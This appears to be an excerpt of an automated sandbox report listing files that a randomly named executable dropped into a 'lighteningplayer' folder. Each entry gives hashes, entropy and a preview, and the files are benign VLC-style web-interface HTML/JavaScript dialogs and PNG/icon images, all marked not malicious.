                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#stream_out_method').change(function(){.....$('#output_options').empty();.....switch($(this).val()){......case 'file':.......var options.=.$('#file_options').clone();.......break;......case 'http':.......var options.=.$('#net_options').clone();.......break;......case 'mmsh':......case 'rtp':......case 'udp':.......var options.=.$('#net_options').clone();.......$('#stream_out_file_',options).val('');.......break;.....}.....$('[id]',options).each(function(){......$(this).attr('id',$(this).attr('id').substr(0,$(this).attr('id').length-1));......$(this).attr('name',$(this).attr('name').substr(0,$(this).attr('name').length-1));.....});.....$(options).css({......'visibility':'visible',......'display':'block'.....}).....$(options).appendTo('#output_options');....});....$('#stream_out_mux').change(function(){.....if($(this).val()=='ffmpeg'){......$('#stream_out_mux_opts').val('{mux=flv}');.....}else{......$('#stream_out_mux_opt
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1334
                                                                                                                                                                                      Entropy (8bit):5.368932485618988
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L42D21QxomBDSg1ILk1LJK4DyNNooAisuDr0IILOw46ZrIDbH9EaDb6HwMPaKZtV:aCSg16OJ5D0S8suDoI6xZcDD9EaDwy/y
                                                                                                                                                                                      MD5:06AC4C0CD41F6D82FBF3AC0053567295
                                                                                                                                                                                      SHA1:5DDBF4E9F947A42819E00C3B5801EDE0839ECF4B
                                                                                                                                                                                      SHA-256:62CAC570011B9B07E0F421612571A1CE663E49DD3B90A16CF31D8855F1ADDDAC
                                                                                                                                                                                      SHA-512:32DDF815FF7DE04562ED71A0F2484770BC03A4730662A35CD93C42F0771742D0DDCE1292CC96BEA06251C97380291A54E9B89563CF078B36B684B58DCBF7EA72
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...var bands.=.new Array('60Hz','170Hz','310Hz','600Hz','1kHz','3kHz','6kHz','12kHz','14kHz','16kHz');...$(function(){....$('#window_equalizer').dialog({.....autoOpen: false,.....height: 650,.....width: 500,.....resizable: false,.....buttons:{......"<?vlc gettext("Reset") ?>":function(){.......$('.eqBand').each(function(){........$(this).slider('value',0);........sendEQCmd({.........command:'equalizer',.........val: 0,.........band: $(this).attr('id').substr(2)........}).......});........},......"<?vlc gettext("Close") ?>":function(){.......$(this).dialog("close");......}.....}....});....$('#preamp').slider({.....min: -20,.....max: 20,.....step: 0.1,.....range: "min",.....animate: true,.....stop: function(event,ui){......$('#preamp_txt').empty().append(ui.value+'dB');......sendEQCmd({.......command:'preamp',.......val: ui.value......}).....},.....slide: function(event,ui){......$('#preamp_txt').empty().append(ui.value+'dB');.....}....});...})
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):501
                                                                                                                                                                                      Entropy (8bit):5.114420962466138
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:EqJmDwQ2Sz/vtceyMixwINiIIL/+LCDsX6YMPYvw2bsLbm538zP/:L0wQx/FxUr0IILqCwqYMPYvtoPKC/
                                                                                                                                                                                      MD5:AD9769B13838D62653857FF47718C6C0
                                                                                                                                                                                      SHA1:A4683573D5B43ACA9E256D4A45DC5AC46DB927ED
                                                                                                                                                                                      SHA-256:75D1A1AB807CD97801BC37ED547B26C7B357497E82D01221AC064497C9480304
                                                                                                                                                                                      SHA-512:58A7D9CE56936DA79A8F46F0F5C1E465D63EE1B8F68701627FFA00E1C43267899A64A3DFE601BF660BFEE66B5EA365A27BA8D68F7D598AB6E3A917B52D6E9FC0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">...$(function(){....$('#window_error').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Close") ?>":function(){.......$('#error_container').empty();.......$(this).dialog('close');......}.....}.....});...})..</script>..<div id="window_error" title="<?vlc gettext("Error!") ?>">...<div class="ui-state-error"><div class="ui-icon ui-icon-alert"></div></div>...<div id="error_container" class="ui-state-error"></div>..</div>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5078
                                                                                                                                                                                      Entropy (8bit):5.334944394253884
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:9ODRbniQxE7XrCubCMJrhfrHlUdBrDjdjosn:9ckYaXruMLblSBrD5josn
                                                                                                                                                                                      MD5:FBD60881FF01355E0ACF55AE6EC77580
                                                                                                                                                                                      SHA1:2B9B99F754BD7B85789A3AD6D3E4965C59093627
                                                                                                                                                                                      SHA-256:E474CA66E17ECAD86FDECD0FF4DB1EFF7EEE70083C2CB30498F81BCE71D03E18
                                                                                                                                                                                      SHA-512:1DDFEED4B0530B9C8606B6D0E53D656ED19213AFAC2D16D13D8BD9BF159E6883FC2EA943D5C5044579A51B11C98B6854CECA8C6E44796C5C511CA83250F60CF0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_mosaic').dialog({.....autoOpen: false,.....width: 800,.....maxWidth: 1000,.....minWidth: 800,.....minHeight: 500,.....modal: true,.....buttons: {......"<?vlc gettext("Create") ?>": function() {.......$(this).dialog("close");......},......"<?vlc gettext("Cancel") ?>" : function(){.......$(this).dialog("close")......}.....}....});....$('#mosaic_bg').resizable({.....maxWidth: 780,.....ghost: true....});....$('#mosaic_tiles').draggable({.....maxWidth: 780,.....handle: 'h3',.....containment: [13,98,99999999,99999999],.....drag:function(event,ui){......var xoff.=.ui.offset.left - $('#mosaic_bg').offset().left;......var yoff.=.ui.offset.top - $('#mosaic_bg').offset().top-17;......$('#mosaic_xoff').val(xoff);......$('#mosaic_yoff').val(yoff);.....}....});....$('input','#mosaic_options').change(setMosaic);....setMosaic();...});...function setMosaic(){....var rows.=.Number($('#mosaic_rows').val());....var cols.=.Number($(
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1942
                                                                                                                                                                                      Entropy (8bit):5.202761977992723
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:o46dnco/akUXU3Hniag/akfaniig/akn4L6p9FQL:MnjakUXU3nhOakfanFOaknk0XQL
                                                                                                                                                                                      MD5:BE2110A67187E5529B0B5C264D64FF2C
                                                                                                                                                                                      SHA1:4B5D5F7C1AC90AD298C47323AA3E07548B9096A5
                                                                                                                                                                                      SHA-256:F0C8450D88F4A64396304652811C3B9D215B9CCEB24C36A0753042E68A688AB5
                                                                                                                                                                                      SHA-512:7C305A2C9375F24E769A292D960F8E38EA4CF934AA3DE2F80620BADC6B20D68AB07ADFE77840105D8721299BC3BE794A27B1FC33E54C10F0B3FE52AB5DE13BA9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_offset').dialog({.....autoOpen: false,.....minWidth: 400,.....buttons:{......"Close":function(){.......$(this).dialog("close");......}.....}....});....$( "#rateSlider" ).slider({.....range: "min",.....value: 1,.....min: 0.25,.....max: 10,.....step: 0.25,.....stop: function( event, ui ) {......sendCommand({.......'command':'rate',.......'val':(ui.value)......}).....},.....slide: function(event,ui){......$('#currentRate').empty();......$('#currentRate').append(ui.value+'x');.....}....});....$( "#audioSlider" ).slider({.....range: "min",.....value: 0,.....min: -10,.....max: 10,.....step: 0.25,.....stop: function( event, ui ) {......sendCommand({.......'command':'audiodelay',.......'val':(ui.value)......}).....},.....slide: function(event,ui){......$('#currentAudioDelay').empty();......$('#currentAudioDelay').append(ui.value+'s');.....}....});....$( "#subtitleSlider" ).slider({.....range: "min",.....value: 0,.....mi
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1300
                                                                                                                                                                                      Entropy (8bit):5.174950869624417
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L0wQxOxUl1ILlDlezVh4WUNDRILCwbYMPljLSvkjwKHE3YfHD0y:YxD6lDleT4dNDR6JdjW0MYV
                                                                                                                                                                                      MD5:553C71D52DE92810BF4AFA6E655B5D19
                                                                                                                                                                                      SHA1:2F434F7BF9E3A8A40BFA7151FE18F516E02BE90D
                                                                                                                                                                                      SHA-256:57491AA7D11E810E8BCE4EB47B0227FF672304076CC88AEFDCF30AF5B05C9368
                                                                                                                                                                                      SHA-512:601F8095945FD6ED5E81BCF58FB805EF87ECC1A9A8F15830CE608DC796DFD0E8420169D0ECDA4A0A2C74D49855E539EDE74DB95D5EA8D25F173CDF1C0481C796
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">...$(function(){....$('#window_stream_config').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Okay") ?>":function(){.......$('#player').empty();.......$('#player').attr('href',$('#stream_protocol').val()+'://'+$('#stream_host').val()+':'+$('#stream_port').val()+'/'+$('#stream_file').val());.......flowplayer("player", "http://releases.flowplayer.org/swf/flowplayer-3.2.7.swf");.......$(this).dialog('close');......},......"<?vlc gettext("Cancel") ?>":function(){.......$(this).dialog('close');......}.....}....});...})..</script>..<div id="window_stream_config" title="<?vlc gettext("Stream Input Configuration") ?>">...<table>....<tr>.....<td><?vlc gettext("Protocol") ?></td>.....<td><input type="text" name="stream_protocol" id="stream_protocol" value="http" /></td>....</tr>....<tr>.....<td><?vlc gettext("Host") ?></td>.....<td><input type="text" name="stream_host" id="stream_host" value="" /></td>....</tr>....<
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4252
                                                                                                                                                                                      Entropy (8bit):5.1855781919952015
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:I3cQXljXrc1tXrc7XrVkXrSwzZb0hLEOXrHTBXrKjXrr1TwXrXi9XKK0Z:WcY1XraXrSXrqXrJghL1XrHtXr8XrrNs
                                                                                                                                                                                      MD5:042337F0F4A68CE50BFF9BB174F1F148
                                                                                                                                                                                      SHA1:DEDB805EC6B0DDAB566AD49AC44D75CD2FCE676B
                                                                                                                                                                                      SHA-256:B103C0D7778D1694FDCAB3AA28DE6EE80AA9A10288355D2F47EE9ECF8A2462E6
                                                                                                                                                                                      SHA-512:F906F16EEBF05378668EF3B472631AF90178F469F3453727C95552091A0EF95D3C72C41BEA6887BBBCD07B5781FE8D4244FC78E941B7A95ABE0EB2287E12F14C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...var stream_server..=.window.location.hostname;...function configureStreamWindow(stream_protocol,stream_server,stream_port,stream_file){....$('#stream_protocol').val(stream_protocol);....$('#stream_host').val(stream_server);....$('#stream_port').val(stream_port);....$('#stream_file').val(stream_file);...}...$(function(){....$('#window_streams').dialog({.....autoOpen: false,.....minWidth: 600,.....minHeight: 430,.....buttons:{......"<?vlc gettext("Close") ?>":function(){.......$(this).dialog("close");......}.....}....});....$('#window_stream_config').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Okay") ?>":function(){.......$(this).dialog('close');......}.....}....});....$('#button_create_stream').click(function(){.....$('#window_create_stream').dialog('open');.....return false;....});....$('#button_clear_streams').click(function(){.....sendVLMCmd('del all');.....return false;....});....$('#
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 6 icons, 32x32, 8 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):86358
                                                                                                                                                                                      Entropy (8bit):3.516013150576034
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:6gEX6YaSd4Psq0PXpmWu79B1ArPUco9FLdS1EAd4kkVIIOQSOZ:CraBIpPQMPozgEAQIIOI
                                                                                                                                                                                      MD5:6F7E92FE7E6A62661AC2B41528A78FC6
                                                                                                                                                                                      SHA1:2353AFB5C229987DF63696FB48BDF840AA208791
                                                                                                                                                                                      SHA-256:FD9B5998B98EE0BA86ED7687F215A1CDDE90C00B0B1CD11DC83E3614389CB6AD
                                                                                                                                                                                      SHA-512:E173D8937EA262CEE649C4108503C24159E39C00CB4A89C2E50C6E0FF0CDEEAA6B765E53B98027315E0CDE71C14694486BDCDA0B37B0F1AA2CA24E2A5099DB28
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ...... ..........f...........h............. .(...v...00.... ..%...... .... .....F<........ .h....L..(... ...@................................2.......b..J....f...z..........b...R......&z...n..............R....Z...F.......n...n.......Z.......z...b..J....>...j..J...j...........R...v..................&...........R........v.......j.......:..fz...z...f...n...N...........Z..........J....j...........f...R...............r...f..F...:...R...............b...z...r.......^...J...~...B...j..F............V...:..>z...........^.......6..:r..J....z..........b...V......:....n......R....F.......n...r.......Z.......b...>...j.......v..........*...........n....v...j..v............R..F....~...r..J....V..^....f...>.......Z.......f.......r...f.......^...~...V......................J....................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4675
                                                                                                                                                                                      Entropy (8bit):7.930778622036407
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kRnJQYR5hMutwkgil3D/NhFFFVJu6N/jBdRCPq:QniI5Sutr1lz/DFPVU6VjnRT
                                                                                                                                                                                      MD5:1C068F2B9B854DD4D8E71DF78482BD93
                                                                                                                                                                                      SHA1:779408823553A29F963FFD465AAC2B3EF3167A90
                                                                                                                                                                                      SHA-256:372B03407E4C070AAF05D9BCF70BC048A2560593B7D3E4C919EDA602C1CB5D0B
                                                                                                                                                                                      SHA-512:768B5A064E356584AEBC58EBC6C748FBAB15A070EC1A91DF803424954689EEF5DB8902F16392B1AE621A3677AEE717B2AADC08DD1725DDF620F655BC39374228
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W.......IDATh..Zi.\.u...m...E.-...B.l..Q!aac..1....2.r.\.L.J../.p...W..[.O\8..@qe..l..a.X.h$..iF......{O~L..d...eyU..{U....|./13.?_t.'............O.qr......~.....^....p./..5...... ...Y....ON..;!...&.c.....8.......>..5.|.:..)..'.vf............C:..ZC.k......C~.O.\4.-nG....,.W.!.z..d.k.!>...=.N3q.......t..I..g.wA.5..,.].-....5...XC3....E+n...6q...E.{.P.A..XD....c./.......).eY.....#t.x..?.C8..$[:I............t.....8rxx..o..]{..x.7.~.z.P(8Z. )2)...m)izKN..?..N...UN.... .{..C.....1.w....s.`...]...;>...w.]MR.T..ve....R;..ZS..T....._o^...0..K..%.m..u.}........,.Br....9. ....[n.e...q.z3...A..YG...$...5......H...~F..N...1N..d..DD1.............&....3O..6....Q.....7~.._...{.i.Q5.r./........K...a.`.4..H N.B5..;....HT..........ve0/.%A`T=..o..c.]Cr..g....{b.\.....W...;n....l..*.U.m'_..i..@..1.....t.....i)."A`.....A.!..h..L.....6}....;......~q.............s....Z.\(.lY.....e...r@.w.o.`.A3.F. .....x/b........h..W.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2025
                                                                                                                                                                                      Entropy (8bit):7.883325871296714
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:xt5upIu6Ozh5ea7/lf/g5pw8kqZOcjw4cLiMgCkZsjHxaEZSwz2j5na:xd0B7/Rmw0vw4cftJsIhzq8
                                                                                                                                                                                      MD5:90E1C78DC357DBB709A8E51018A4FD9E
                                                                                                                                                                                      SHA1:A289F86F632B083F2D23D5096377C79B75CCD347
                                                                                                                                                                                      SHA-256:E92C787DF1D4C93EA84BFCE7CF61448DCA2879C4C2B9A9D8AD1E8C80F4001AC8
                                                                                                                                                                                      SHA-512:825945EE3935A15D63944A4325D7186D0EA8BA21F3C02580AFF87819EDCB2C7A53AB950A1115D42BB606E56680F3A89FFC217B67B708C226B3EEF806A2214694
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W.......IDATh..Kl\W.....{......$$&/.M#b'ncW.!H.. !....H..@Q$.R".../.H....j$......*..$-.BBi......1....y...&q.y..Fg.w............Z.e?......5........Ik.u........Z..G...|~.......t..{...'.... ........\!,R.^..,..Kh-.|p]P..Z.zO..?..m............>...c68.......$>.?{.|.-...:Y..^&.UP..9....#..:.x.7#...~.N..I..... ./....k........q.~......#,g.....L{...Q....e.+.B......gp.a..}...a_......3.#:Hb..n.c.?.........K0r..|..#y.ws..J..._.P.`.4...e.J....s..6...Q(h.Y]...Y...../..'..6u.{...\.h....m.........0Y.Rd)..h%9..+..X...<.7.#.g'....1l(..nD[.@0^...`.....7..$..[...l.<.`d8.[7._.i8:<....l.<.G..\.....7......BB...X..<S3....o...<.NbS...Qm......6....x.)...........<...F.......<..98....4..y/.J..:4@a..fsE8...J5GB..|.....3..}.b..yl....rC...}4.b.w...x.@.!0~a..iB..~J.....a.{...$.g..~.....8.........gs...r.&..........R..0.......OE...=.....l.`..F.Q.d.......k....MB|....9s.. .w.D..?.5D .R2....T..m.a....g.,n...c_z...{..Zc....H../.r.....|.@w;..pS/ .....
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1353
                                                                                                                                                                                      Entropy (8bit):7.803487570553727
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:yoJG9dkZJr/F8+TJLdgH17+3vifhVZZ6JOCO0omxCKTnQhQQ/MXaJt:yo467/TJLdgH17+3cZZazboIdbtqt
                                                                                                                                                                                      MD5:4743F4B1508D6E2885CB3E2AB1587629
                                                                                                                                                                                      SHA1:533CA01C16863F92B91F60B07BCC33ADCDE4C973
                                                                                                                                                                                      SHA-256:A5A4ED70D20CEFE54E541E15BC007A6D36339FB6B8428806F7B48F846E8B9160
                                                                                                                                                                                      SHA-512:996FE7B228F385FC16F77F612F66A351BAE9A5FD3CCA3E7B6D6029C925DADA687DF6E106E37E3FF4434F6BE54EE896160BB77A591284DB8F7E20F315E97A2ABA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W.......IDATh..Y=o$E..].m.zo...H...#....."..D..G... .b.D.d.."B2DB.....|>n.......{.\..3..N.pK....y..uU...f.e..R.."pE......./4..lii).".wuu......F.1.e....lg..b........O0...SJ(x.s.=.L..t..'.....@|=..^.E.i.k..).?...F.S1..a.:.z.3.1.|..#...$..V..&....#b..:....<8>>....#0..-...../Q...Jg..,BB....9.|.$>?::..X~L.....s.y>5..xo4 .WA.,....3.!...4j...N&..t ......G..B..."H........B..}..0..JA.-8e.;.iY....t:..H.../..Kh...6U..gncc#.L..~....@..m..O......n.{....n.s.....2.1.N.\.x.;........f...^dg.......k...o.....\-:.sb.8. ?.J^"Y.f-F..^.-H.+.3.3...5.<.."...Hb.C..F....4..6.r*..7Dn"..$........x.'oI.aXM.f.8&.++.........."......X3.yH[.|...).P..[&1I[..........aG..Z."....@(.e......x....}\x.....A.d.".....:IZ.s!.%....h......_F .}...o=.Z.x.S\.C.. ....`......$B@c...........X..mu..d]."#Yc1/.....=..y.Ot.*.....nK.....l...:....3z...../6..m.....o.....c.S..x.....g....2....!Nz.....Y..x.g.^.....1/.<C....e......".lrL....}9fY....].(c..,TV....CU..s...g4@{.....B.).
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2921
                                                                                                                                                                                      Entropy (8bit):7.917748891185905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:nRZq+l/2n+vSiIdsQ3GoqKDNBwc7rh62ChYDZ5DrR8+t4rvr9GyTPm9V34fK2v:RZfl9vdI2Q3GFKD/p7rIjh+JrRntuUyd
                                                                                                                                                                                      MD5:C060535924E3D9806695FE92AB0BF49C
                                                                                                                                                                                      SHA1:80A2DE9DF9369253ECF7C1118D6E1D02384F1BA0
                                                                                                                                                                                      SHA-256:48878E2D1D5DCBD686358A180379D61F82AAF862FA2C4030933C1AD4E7299A20
                                                                                                                                                                                      SHA-512:99E49C459C2A905EC296FB6DC6551151CDBB2AC387E9789455AB403BE38489F1C7BDCC624B2FF2DD69E3C0FE45795391126FD7E40BA2521093C1978D45FC8419
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W......0IDATh..Y..W.?wf<~{....z...z.x.T-Q... >.".....B?..T$Z....)BB... Uj...!."R.(.$i^%.m.6..>....1....3s...H@%&..3.c....;.s.5.,.>..........Q..).v..o..c....OX8[.........o.T.|r...|...?....8...+...?.........o.b....#.l.9.....cc;z.1.4=cM...kS.k....7{.....P..x<.x...{w.....Li...766..(....`...G...Z....4.+{.6X.$@Y.g..."..31M.j.V.. .......0t.........AY.;....,.d`yls#.].GG.f.39..s.["....DyT.C.....J. .H......<Y........-....Z..%.#"..6t.gB"........P.....t.....H....~..F...g....kF'./'.k...........(.Z..j..1...G1..l..r...6...H..7.. ).C7+.1...w.W.............@&....rI....s.a@?..t.._.4zG*....?.Q.It.qY.4U..R.......v.P(..q$....m.F...Z0....).T.D^8.M@..(....)Io.....dR.Lf*..O......t..n....jSq@]....S$.....&....=..`..(.).~_>?.P.k....f3......@E..RI.e...L.).;........<=R........\8...v.0_....6.^.TE...`.Cn...r.(L.....p<..N.cv&.(e...FNV#77l........yP.....L.[.n....ES...|.d@...p.....y.u.......S..9..{...........,NMkH.$Q....PRS.,.m..|.h..*...*..)G.W#.v.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5115
                                                                                                                                                                                      Entropy (8bit):7.949408664568695
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FNqlZ7xK/Vw/nEbssJRv0OePeEVxdU0pNOT+cujz+oeiWKoyj6CkMPC:Y9OVw/nzssx60GBmz+xNKBjdq
                                                                                                                                                                                      MD5:E0D1A6C8778E2839EFF8203139673DF0
                                                                                                                                                                                      SHA1:82E0EEBFEFD8D0F66F38CE6338FD353DB5AEF0B2
                                                                                                                                                                                      SHA-256:AA6039A0466683C195E0D2C4B4BF8602BD2173E955BC8DD39CA793D207985A3A
                                                                                                                                                                                      SHA-512:B23933BB91C817CD2AEA70B7E171367A748F4C25CFEC4576F98F844EE49F47F1EBADAD399B5AEFD9F9DF492E67322FB130FBCE74C0A0870F37C22F40F503BCBF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W.......IDATh..Z..T../]{WU...F..(.a..@0....Q3..MFG0x<:.!.93j2n!..(..1.H.E..Pd.7.7...........p..=3...Iy..U.....~....TH....K...0.!.L"..A.T....7.t..............O...vt.D"!....w.,j...G%.T~..5.x<...u<.....b...y..}.......%..j.?....l6.D.^.y.y.p../............A.....wa.0.GnZZ.......Dv...ACe.5...&.....dr...RSS....x.....h4....w.J...xF.477.....xpp...mmm.9f..h._.7B. .{-.u.....Vk..l~....+.~/.......2f.dx....b6....a...hmm.N.CJJ........_.A0........ 0....C8.F^^.#..."[.d.8.. ~.C..$YLQQ.....u..).x.....z.%....h>s.=}......'a\^..0........%...).....q.x.}.CaL.x"223.@...kc......../G{{.|.W....f..m.....s....N.5........._...G.))?9|...:.QUU.I.&..ta...P^Z...}../.u......]w.bD....UW..........3...Y.E[;.n..7~..g...R4....^I....@sC...v......q...%K..0u..jF.).p.UYY)`2?...v~.[.i..g...h..NK..{....#....9s.H...D.H.<..d.X..[.....~i.m...D.H...{..q....E\XPP*.8.%.]..#.....n....--..'V.eM.7."d.m...@".x,......`....._.......&...9.,&9z.o.>..:d....,n...c.O.Y)D
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 672 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11954
                                                                                                                                                                                      Entropy (8bit):7.941224336803605
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:bSpfvEkUnAU6qLspUU2q2Yvbk8NepdGj8zD9Ty8ynNWEnsxqI5yT6FNSgOTTjGQ:ON763YpG0o8NAIjw6nsxVeMNSgON
                                                                                                                                                                                      MD5:6F26868BA019D0C63E0F6F75EF455646
                                                                                                                                                                                      SHA1:25396F2CD88001FEE9AA40758D37433352A12F0A
                                                                                                                                                                                      SHA-256:C3904F63906DB4346D2E0529285397C0CED3DBD5132DBA250C3FCB28ED6A96DF
                                                                                                                                                                                      SHA-512:00DAD8BD1827299493C2B800206C884F54026413B59B9004F2AC3FC7DE4DBFF2DD91B91E4F018EB9F051D1ACF23646D8F6BC1DB70B4A751B2C529AC504F8ACFA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......0............sRGB.........bKGD..............pHYs.................tIME.....:..k.L...2IDATx..].t.E.F.g.QP.a..eW..5a.!.I.B..K..D.E...YB...E..A..l".SQ..P@.P.....q..<.9....t?:/._.K...:......n.]...:..:..:..:..:..:..:..:..:..:..........3*....:..:...4dv.Z.[w6.,q.9..5.U:`..K..r........:.#....]......]i]2V.......m..e..........A._..$.I.+.............K..5.p.....k...._..gtu.Q..../z...\...'.C..k{e....c#y........U..s.i.....<...>I3sf..c8.w..;tZ..%=)#...2...!.w....~6..?[..?.......?"..K..5.0.|....._...5.R._.]...D....l....6.........G.^..;..pi..%...k..E.y..q...@..3..e.......x.<p. .9j4..?...%.x{.w...c.k.e8"....'.I..g.~..g.~..g.?.~..y... ./...".....eu.C.C..h........w...!........#.zF..4h.<.o.<`.B.;m!gO.....G]'...q..y.,j?r&'.....Q.Op..).r.d..o"7.?......]..).cZ.dS......q@{..]>9..R..........J.......3....J...I.K.%.......(..;z<.?.~.t.~.(.+..,..s*....QA._...E...%O..f.K......5~._....._.Y.:...V.^....y....'M.w.&.=Ic.|I..u...q
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):942
                                                                                                                                                                                      Entropy (8bit):7.707652841230822
